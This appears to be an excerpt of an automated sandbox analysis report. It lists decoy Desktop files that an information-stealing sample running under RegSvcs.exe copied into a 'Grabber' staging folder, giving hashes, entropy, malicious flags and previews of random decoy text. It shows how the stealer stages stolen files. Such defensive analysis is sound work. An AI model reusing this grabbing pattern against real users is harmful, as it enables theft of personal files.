Preview:	QFAPOWPAFGZUMXROWPODMNAMXJGGULHBVFMBDFCUTBDPEHPYKVYAURAEPYZMHPBECXOGPOKPNMKAIBYHBFNFVWPHHZFRFVAYYHSJZJTHAYESIKJCXVOVANTTAMQKCXEHJRYFSWGEELTALODIPFLWFILANHAGQENMCPNFLPAJIPRNZRAIETALHZECBIKVUBLJMHNYJXPSAMZZCVZQOHLATXYVRZQROYHFKLVOJLGRAGXLMXJHKHSSCTHDFNSLOUEZPTFGVVVGCDIXIBWQFIIFACZAYUUQZJRKZXJQPLVPFTJAMSPRDIBBPPFLUCOUPPQDSFKQXMEIFUXXAGKAWLWJPNBHZSGIAFFXPBLRMFNGMVBEWTTPFJEHMXLOZWQHEHGWBXCAMZISSZMPHUOREQDUTUEPDVLBWTFCJIFAGQOEHFIMLTDTDLYPEQZDZBBZYMKXTUKVCEROFCABVNAQXVLLCCNLEOGKLFPVSGMNNQZHFNCWNPGBCLLMTYKZMJSUDIPHSUQJQTOTICLSMQNHYJAQTVXMEZAEGNBGADHUJNJLQZSSGWRLYBWJEOTERXWRTICIVUFNKHRUSWRGABWPZDFTGSDASOKXSFUGVBUISDQNJUAOCSOANZFXTFQGDKEKGZJRMJMGTAJCTJEOCZCUZMUYKAKZZQYDRJXWZWMOXQQLWJMWAENIFMHJXMELOZTVHRLQZNWCBXKEBNUBDDOFYHNWIPPRWGDZCQLMHAOLYZIDJJXAASOVDNHNMDDCIWFPIOLQHWQCPUVUZUDVOKBMFLALCZEQWJAKTVUUDROHEKJKHQBLQZNVWSNNZFKMZLQPFYUYHNCDTCBVUUNKNZIORBFTFVKLHZTQAPWVKTTZFCTHJBBWQMZTFKADJIZZANUOLLRBSVTUCNIJWDQPYHEPWEUTFVNOACOFURIPTLDGJUOYFJRHAUIQREUKUSADZYOEDEDZRKKPKLFLFQIMMIKLOCTSOFOEZYVAGMCITCUWAOUT

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LHEPQPGEWF.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694579526837108
Encrypted:	false
SSDEEP:	24:9mugycA/B3wI1sZj9s/A0ikL8GO/M81cJzg+S+fBXOQklGKJx3:9mk53zsZj9s/okLklcJs+SOXlkEKJx3
MD5:	2DB1C5AA015E3F413D41884AC02B89BC
SHA1:	4872ADF2EA66D90FC5B417E4698CFF3E9A247E7B
SHA-256:	956C48539B32DB34EE3DAF968CC43EA462EE5622B66E3A7CB8705762EB0662F1
SHA-512:	C80222D65C3287D0A2FB5EB44A59737BC748C95ECDF14350A880CD653D3C39E7B47543AAE9C0CC541A16347E6E4217FB45DF4C96381D5BD820556186ED48B790
Malicious:	false
Preview:	LHEPQPGEWFOTTQHSFLPBDXLJVIUIXWOOHQVLZZIQOCFCCEMSPRTXAPYFKSXYXVFDPHPQVAQHOZTUKTMJPASSTGRXMYXGTLXIDQDVPWENFWHMFYQPBDWALBTHWFOOGFTAJOXJBCGAVMROZGTDWNNZZNJOIJGZLOORSLIGDTUKELZEAWCYJTOCEDKRQNUGUKGINWRVRIZBLNYZHTMFJHWMYODPGAYRQUTWYNKXDXGKZLBYJUDEGJGEGGHMFVTYCBCXJLBZAVKSUEGYRDAPRFIVDNDOIAEPTSNOQFOOYEDVSQTUFNNEYEEUIGJOAYENLWRFYHNPMJNOZNEWSOETCFVVGOQTOKWOVXYWOINEAHLDWXJOPISMHAIKZHVABPYANLCFQWIKUEGSZHGQKKWXTPUBFIXPWCKKSPWIPKGVNCWXTOLJGASSVRYTWKPOWKPNKRHTBSWQBFRVFTWBQEAGHCBTYUFFUUUEETCJIOPUPTHSBHQEPTFPMXQQDWNNIRISDVIUYUOMWIIEYUYGBMYTIPYRGIATEQQSHUXUTRPDXNWAGJAKJPNFAPNYOTRVPNRXEZYSZWDTXKAXFRFJSUHYWTTFWKBWWGQZXFZOXEFCXWVJDFWPMHLZGURBFMSNLFBZNHUAJHVNINGYNAEWHGWKJBYXTUXMFQKRFOCECDYREJUHNVDFGROXJCUQIMSSVRUGWEDDVIRDZYNYCRKTARFGNITFDORCBEIQVJPSIHLNFESPXNWWDSQILJLOVDKOQDNPUZXOJMYFJZKGNEFRLRATVHAMWMOUECPSNVCBIKZMPKBFTSOCSGKZGVKBNJJNGBHUKRERZCJYAICQVNEGQNFRLIKBCSEOCBSYDJBTCRZCCBTDDJNOETTYBUTBOBMQASYZUQJGKMPCMPBLFJALTHXFLNPFUSGVPUKMAQGHDSYASPYSACRNHOHKPBWPSTTZGQCXZWHSUOTIYNSQFNBEDMNZOZYYUDSPJXWXHROGZMTALITD

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LIJDSFKJZG.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69486718145169
Encrypted:	false
SSDEEP:	24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
MD5:	E63B196AE0D5F7670244FB1347D75EFC
SHA1:	1C17108AC7E5263674836BAD67AE44D8C3C6890B
SHA-256:	D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
SHA-512:	63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
Malicious:	false
Preview:	LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LIJDSFKJZG.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69486718145169
Encrypted:	false
SSDEEP:	24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
MD5:	E63B196AE0D5F7670244FB1347D75EFC
SHA1:	1C17108AC7E5263674836BAD67AE44D8C3C6890B
SHA-256:	D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
SHA-512:	63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
Malicious:	false
Preview:	LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NIRMEKAMZH.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694574194309462
Encrypted:	false
SSDEEP:	24:57msLju1di6quBsK4eI3+RkAjyMKtB/kS0G1:gmjuC1uBsNeAokAUB/GE
MD5:	78801AF1375CDD81ED0CC275FE562870
SHA1:	8ED80B60849A4665F11E20DE225B9ACB1F88D5A9
SHA-256:	44BF2D71E854D09660542648F4B41BC00C70ABA36B4C8FD76F9A8D8AB23B5276
SHA-512:	E20D16EC40FEF1A83DB1FC39A84B691870C30590FC70CA38CC83A8F08C08F626E3136ADBF3B731F85E5768561C8829C42DF3B97C726191FEF3859272A03E99E0
Malicious:	false
Preview:	NIRMEKAMZHIQPCHHYDLDLONNDCJFTRECXCDYNWSMACINEWVUDRAWELIDKGUGOSLGTIKNJSPGIFRTNFPWDBIHISPKHOBWBMPRCMOQQAVOUVQODKWHOMRFLDKYATGCKZVKRHTCMHJJGYWRTELTQOLJXKPKLCWLNKOQBPNOJHARBPHMNOZRAICCUCIEHOFBKAUBHQNVPQAWMIZZGYXPDVFFYAGVHCILYWHPIYXMHCXNZJBHOBSYJEJJTXWKIBAQBZGNDHAWRNDJBFGUEFMOHHHXTBQHMIBGPLFFGAEFCSIDIGIIDPUHNETSAWPCSJJCDZPMLCWGKVYJOMJWFUXHEQSIPJDTRUPSCBCTYFLTMLRFJUXIBNGXSREQTWHFPIDSKBRTLLRUTFDXFIDFUXMZCFABRMLSHWFSZTZUJRPKXKHBWYAPJLBFVPDCCGSQYVSJDWWNYUXGFFAMCEWZRCITRTQVISLFKGNMRYVUJTQWJUFSLPGOANDHPJXZJWSWQJJZLPACFDBTCFPQMXOVHIOAMCIQCTLIBSRXETYYSVLPHVURWFAJBQPHFKWZOFSUIKXWOHPOJGFCCQGRXFMTCKHSWJPWBLFTLVERFEAFHASTRMUQSDEUNXGDSWWTOQTUBAZVNLXDRFCZWKUVIGVXHTLERNSTFJCPGLHSIFYNUWMACSMFBHFDCZSOPZRKQGTETMPYNUQPOTCKDJQXQUUMEWVKVIEYDAEXLRTMQQSTAVCIBCOSHDMRFFHIAQDBBMBEOMTPGHKJIAYMKMTMXYUVORUJUGSHEHFCYZUALULRJGKXINMJWUWMPZOJOUMUEFFWCKOWNLIEVQWZPJMTQVIEDAFICXPPSUGBPZSMHDQOIXNDWLCSVZUHTSHAPPFDAEETYFLSNJFPXRPZYQLZLSJQALWIOEGAOFDHHNAOIWCTFHXKZJROQRTVBGVHJKRUCGBHKRLCZODATMBGLOISTFOETTXPJOPGPPJYNFXWQFALNGZLGZVJ

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\QFAPOWPAFG.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690474000177721
Encrypted:	false
SSDEEP:	24:2OgtZqoLtXCKESzKP+tziBUswJwLVk9zxY/tks7VMejXhggCon:cLtXZEmKPopswJEqxUkp82an
MD5:	A01E6B89B2F69F2DA25CB28751A6261C
SHA1:	48C11C0BECEB053F3DB16EC43135B20360E77E9B
SHA-256:	0D0EB85E2964B5DDA19C78D11B536C72544AE51B09DBEC26E70C69ADDC7E9AA5
SHA-512:	1E335E567B7F959E7524E532E257FBC0A21818BDCE0B909F83CBBCE8013FA61A8D665D7DED0982F87B29A5A786A0EE7129792A1B2D48DD205180569D9E919059
Malicious:	false
Preview:	QFAPOWPAFGZUMXROWPODMNAMXJGGULHBVFMBDFCUTBDPEHPYKVYAURAEPYZMHPBECXOGPOKPNMKAIBYHBFNFVWPHHZFRFVAYYHSJZJTHAYESIKJCXVOVANTTAMQKCXEHJRYFSWGEELTALODIPFLWFILANHAGQENMCPNFLPAJIPRNZRAIETALHZECBIKVUBLJMHNYJXPSAMZZCVZQOHLATXYVRZQROYHFKLVOJLGRAGXLMXJHKHSSCTHDFNSLOUEZPTFGVVVGCDIXIBWQFIIFACZAYUUQZJRKZXJQPLVPFTJAMSPRDIBBPPFLUCOUPPQDSFKQXMEIFUXXAGKAWLWJPNBHZSGIAFFXPBLRMFNGMVBEWTTPFJEHMXLOZWQHEHGWBXCAMZISSZMPHUOREQDUTUEPDVLBWTFCJIFAGQOEHFIMLTDTDLYPEQZDZBBZYMKXTUKVCEROFCABVNAQXVLLCCNLEOGKLFPVSGMNNQZHFNCWNPGBCLLMTYKZMJSUDIPHSUQJQTOTICLSMQNHYJAQTVXMEZAEGNBGADHUJNJLQZSSGWRLYBWJEOTERXWRTICIVUFNKHRUSWRGABWPZDFTGSDASOKXSFUGVBUISDQNJUAOCSOANZFXTFQGDKEKGZJRMJMGTAJCTJEOCZCUZMUYKAKZZQYDRJXWZWMOXQQLWJMWAENIFMHJXMELOZTVHRLQZNWCBXKEBNUBDDOFYHNWIPPRWGDZCQLMHAOLYZIDJJXAASOVDNHNMDDCIWFPIOLQHWQCPUVUZUDVOKBMFLALCZEQWJAKTVUUDROHEKJKHQBLQZNVWSNNZFKMZLQPFYUYHNCDTCBVUUNKNZIORBFTFVKLHZTQAPWVKTTZFCTHJBBWQMZTFKADJIZZANUOLLRBSVTUCNIJWDQPYHEPWEUTFVNOACOFURIPTLDGJUOYFJRHAUIQREUKUSADZYOEDEDZRKKPKLFLFQIMMIKLOCTSOFOEZYVAGMCITCUWAOUT

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\QFAPOWPAFG.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690474000177721
Encrypted:	false
SSDEEP:	24:2OgtZqoLtXCKESzKP+tziBUswJwLVk9zxY/tks7VMejXhggCon:cLtXZEmKPopswJEqxUkp82an
MD5:	A01E6B89B2F69F2DA25CB28751A6261C
SHA1:	48C11C0BECEB053F3DB16EC43135B20360E77E9B
SHA-256:	0D0EB85E2964B5DDA19C78D11B536C72544AE51B09DBEC26E70C69ADDC7E9AA5
SHA-512:	1E335E567B7F959E7524E532E257FBC0A21818BDCE0B909F83CBBCE8013FA61A8D665D7DED0982F87B29A5A786A0EE7129792A1B2D48DD205180569D9E919059
Malicious:	false
Preview:	QFAPOWPAFGZUMXROWPODMNAMXJGGULHBVFMBDFCUTBDPEHPYKVYAURAEPYZMHPBECXOGPOKPNMKAIBYHBFNFVWPHHZFRFVAYYHSJZJTHAYESIKJCXVOVANTTAMQKCXEHJRYFSWGEELTALODIPFLWFILANHAGQENMCPNFLPAJIPRNZRAIETALHZECBIKVUBLJMHNYJXPSAMZZCVZQOHLATXYVRZQROYHFKLVOJLGRAGXLMXJHKHSSCTHDFNSLOUEZPTFGVVVGCDIXIBWQFIIFACZAYUUQZJRKZXJQPLVPFTJAMSPRDIBBPPFLUCOUPPQDSFKQXMEIFUXXAGKAWLWJPNBHZSGIAFFXPBLRMFNGMVBEWTTPFJEHMXLOZWQHEHGWBXCAMZISSZMPHUOREQDUTUEPDVLBWTFCJIFAGQOEHFIMLTDTDLYPEQZDZBBZYMKXTUKVCEROFCABVNAQXVLLCCNLEOGKLFPVSGMNNQZHFNCWNPGBCLLMTYKZMJSUDIPHSUQJQTOTICLSMQNHYJAQTVXMEZAEGNBGADHUJNJLQZSSGWRLYBWJEOTERXWRTICIVUFNKHRUSWRGABWPZDFTGSDASOKXSFUGVBUISDQNJUAOCSOANZFXTFQGDKEKGZJRMJMGTAJCTJEOCZCUZMUYKAKZZQYDRJXWZWMOXQQLWJMWAENIFMHJXMELOZTVHRLQZNWCBXKEBNUBDDOFYHNWIPPRWGDZCQLMHAOLYZIDJJXAASOVDNHNMDDCIWFPIOLQHWQCPUVUZUDVOKBMFLALCZEQWJAKTVUUDROHEKJKHQBLQZNVWSNNZFKMZLQPFYUYHNCDTCBVUUNKNZIORBFTFVKLHZTQAPWVKTTZFCTHJBBWQMZTFKADJIZZANUOLLRBSVTUCNIJWDQPYHEPWEUTFVNOACOFURIPTLDGJUOYFJRHAUIQREUKUSADZYOEDEDZRKKPKLFLFQIMMIKLOCTSOFOEZYVAGMCITCUWAOUT

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\SNIPGPPREP.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701796197804446
Encrypted:	false
SSDEEP:	24:C1U2g6pCwYBq9+pGzEcrz023TZ9iFxwELi:2U2gCCm9drz0wTZsIEe
MD5:	C8350CE91F4E8E8B04269B5F3C6148DA
SHA1:	22D523A327EBAF8616488087E2DCE9DBD857F0CC
SHA-256:	1BE0B3682C4F3A3315465E66A2C7C357BB06225947C526B1B89A39D9D120AFBF
SHA-512:	C4891D35B6E895E4A9F4A785701EFFA4305AE88D09D309865F9312D95C296CB417916D8CBA461099E80F68C5AE5015A1172E60319256A453DE81445660F55806
Malicious:	false
Preview:	SNIPGPPREPVDSXKMBCQXEQRWSYOYKDGHPXSNVTYLWVPMUIXPKXDRFHMINIQBFZTPTVMTSZAWIXFLHCKJNAWKCQYMBHUKFDOIJBXXLUNVNMKEDOTTPPDLIAGSTXKJKMHVVGIGUNGKPTPDUEUVMGZRIBRMBHLZOZZIBTDOCDOASXCIFRVGCSENFOEARIYUEACCMVFPUDRRUHYQQFJBAWDGKHRWDHTGYUXKSSVSTFCVQOQGTKOBOMZZTKVYFLAXTKJMTUDSETBGCOOKYGPLGPNAFICZERONWJHOMIWLGEWSSANDAVRYRUWZSRNZFYKTMSQXLZZGTQKXVQLDKQIHEDADRTKYMYNBVWROSFBYUXYULCESFAKNPBXYOELAWZCZFAPVQWMMNLBQRIPMVDMMWGXGKDJNUJGGGBNSGWEDDLRHGAAWJCYOEMVEHAYXYEHSKMWJPPHERNLXAGENBCUAZODRTUDIOUWNPZSHJGYOVHWQKWRAGGUMLCITTLAJXOXDUPFFLAHWLWPRQRAXSKOBHTXQNNGYHHVLBOEFTHAXTLKUGTNIYSDATIJHBUFTSGQHRXQQGXCBWVJIULNMYSMFYMPXRZOWMHYMZOLIBIYHPQRQJTZOMJZHKRTSWQQVINGIZHWDLNCJKAMKHSMFOTUPQMESXHXMJSAXESVNVSKORQSXVCYCKNZKOFZFUKINTRLLEGXVQTQURFVKWLFRQZVQVBVOEMATWFLXFDJVWCYMPYCSJCUUGUCIPOPIVLEFNZCPNYAWTXOATSTYLECDEFJNQFYGVPQWTJBNAVWKGALRTACLENBODJOQDXMPOYCYEFXOOOOMCQXLRGDBUUVJNQAEBZDSPDLPFIEOXRWSFCHXDUSBTSLEDLCZPOHIMIMQZMHHTMDFUUMKUAMBYNWWRQKDEXPPDWGKCNTWTFNHBMNDQIMVNFYWGALYORHHPUAXLDHMTGOKMMTAOCOVLGFIHZLZFADWMNNCWOLNJDSGFCWVDBYK

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UNKRLCVOHV.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698999446679606
Encrypted:	false
SSDEEP:	24:W9l1TKf/7G6pHxojyPqnhSz0hujim56BAhI8QR9QlFpd:6l1uFqyP5zY5moAoah
MD5:	73351F70BFEF33BEEA9E1CC192801D02
SHA1:	ACFD9C2DFA1B38FAB53EEB4730B0DF0551B45D8C
SHA-256:	F6917A805A90AC72064D294E5E0FBA4604588F7B0EB2B3A3511D1FC6887E3E24
SHA-512:	56D46FF29F86F3B314EBC6CC456A1D153D0F1245A926F82AE7FA9A6A5AD792094FEDBB5FC489929186C8A72732BE4EAFF3BCF2E508B8B2FC50B013E6166B212C
Malicious:	false
Preview:	UNKRLCVOHVAXPHOHAZYDIMBTYYPLYBYVUEQLGGJJCFCITCEMGOMMPTCXLGLYUZHZWMTUNUOFUUYAUDMSGBWJKAMIFUAYTDIKVYQPGYQSIZTANWSUNZDHBRNONSOUWVUJZFBPOZIMZOUPVAYJKSJULUHYRYUUOLYWEWFCYAZHMJKHXUZLTHEXFDNRXIUQOZHGGMDFHSXAJKHPBRPJJKVVXGMDIMEMMFXEOBQJSMYSSMPVSVUNJLJSSMEFHHLFEVPWZDDEIKQGOJPOJWTWMNPIEQXWXOBLNLDRNRUGDUXCMTURFAWMSSYAENGRWRBIJOYJNUMDYXNDETRQMYAMGJYZKZQPFPCONTLPPRLYMQJPIWCAXNOLGZOTNQEWQGBVSNORDVIXIUJAENWBXHSXSDNAMBAXUDBRCRHHYFJQLZEAGFZJUFMBIUBABNXVYITYPKRJUMGDPPABWBKNLHDKPLRUIRQXXKLFZAHHOQZHNTUNORTHIPKRZRDGRVPKIZRHYAGOVNDISDQRFXONCHILLZJTGXRZPEIPHKZXDBODDSUZIKNUVTNMZGVZQILJHRYJYZKDBLCLJFWSXRREYFFMEXBICHNCCTBTTTTZZVMSHPBKJMXPXFJNIDQFSJDMCXXUZPFVBFVKYCVFVQFUVOJWWIUNBICQVZGOZZVDJKKZTGDLWXADCBHYGUDWYWTYVYOOICLDGZXJHSTPFGQBMRCCCBJSXCPVVBKRNYTLTAOWPNJFKXUXQORRVHCHMSRAHQHFDEMZUFOFJOQFXHQBLWKNHXKEBLUJMQCFCSTBVXKUUPPXZNEWBUZPPVJFCDLXJEGEZSQSHHBNUCTRMEDMGPNZBHGEXVTWWZFELEFQQWXGHSVDMBAGZANSOHWAGHWRFCVNRSBOOZFJQONOYPNXBMHJINMGSGLMUSTAOMZXKOIHFYYSJWELBRBKMJUVQKVVFUFLDZKJVPCATVIHCISAYNPTMBEUQYJRYFUSBKOSITLVDUTJ

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UNKRLCVOHV.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698999446679606
Encrypted:	false
SSDEEP:	24:W9l1TKf/7G6pHxojyPqnhSz0hujim56BAhI8QR9QlFpd:6l1uFqyP5zY5moAoah
MD5:	73351F70BFEF33BEEA9E1CC192801D02
SHA1:	ACFD9C2DFA1B38FAB53EEB4730B0DF0551B45D8C
SHA-256:	F6917A805A90AC72064D294E5E0FBA4604588F7B0EB2B3A3511D1FC6887E3E24
SHA-512:	56D46FF29F86F3B314EBC6CC456A1D153D0F1245A926F82AE7FA9A6A5AD792094FEDBB5FC489929186C8A72732BE4EAFF3BCF2E508B8B2FC50B013E6166B212C
Malicious:	true
Preview:	UNKRLCVOHVAXPHOHAZYDIMBTYYPLYBYVUEQLGGJJCFCITCEMGOMMPTCXLGLYUZHZWMTUNUOFUUYAUDMSGBWJKAMIFUAYTDIKVYQPGYQSIZTANWSUNZDHBRNONSOUWVUJZFBPOZIMZOUPVAYJKSJULUHYRYUUOLYWEWFCYAZHMJKHXUZLTHEXFDNRXIUQOZHGGMDFHSXAJKHPBRPJJKVVXGMDIMEMMFXEOBQJSMYSSMPVSVUNJLJSSMEFHHLFEVPWZDDEIKQGOJPOJWTWMNPIEQXWXOBLNLDRNRUGDUXCMTURFAWMSSYAENGRWRBIJOYJNUMDYXNDETRQMYAMGJYZKZQPFPCONTLPPRLYMQJPIWCAXNOLGZOTNQEWQGBVSNORDVIXIUJAENWBXHSXSDNAMBAXUDBRCRHHYFJQLZEAGFZJUFMBIUBABNXVYITYPKRJUMGDPPABWBKNLHDKPLRUIRQXXKLFZAHHOQZHNTUNORTHIPKRZRDGRVPKIZRHYAGOVNDISDQRFXONCHILLZJTGXRZPEIPHKZXDBODDSUZIKNUVTNMZGVZQILJHRYJYZKDBLCLJFWSXRREYFFMEXBICHNCCTBTTTTZZVMSHPBKJMXPXFJNIDQFSJDMCXXUZPFVBFVKYCVFVQFUVOJWWIUNBICQVZGOZZVDJKKZTGDLWXADCBHYGUDWYWTYVYOOICLDGZXJHSTPFGQBMRCCCBJSXCPVVBKRNYTLTAOWPNJFKXUXQORRVHCHMSRAHQHFDEMZUFOFJOQFXHQBLWKNHXKEBLUJMQCFCSTBVXKUUPPXZNEWBUZPPVJFCDLXJEGEZSQSHHBNUCTRMEDMGPNZBHGEXVTWWZFELEFQQWXGHSVDMBAGZANSOHWAGHWRFCVNRSBOOZFJQONOYPNXBMHJINMGSGLMUSTAOMZXKOIHFYYSJWELBRBKMJUVQKVVFUFLDZKJVPCATVIHCISAYNPTMBEUQYJRYFUSBKOSITLVDUTJ

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UNKRLCVOHV\AQRFEVRTGL.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.691266297898928
Encrypted:	false
SSDEEP:	24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
MD5:	7D4E714F4EDA4631DCA8D420338392F1
SHA1:	536B4BCBAB5C780738EE2D562D16AB532C9D8E68
SHA-256:	841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
SHA-512:	FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
Malicious:	false
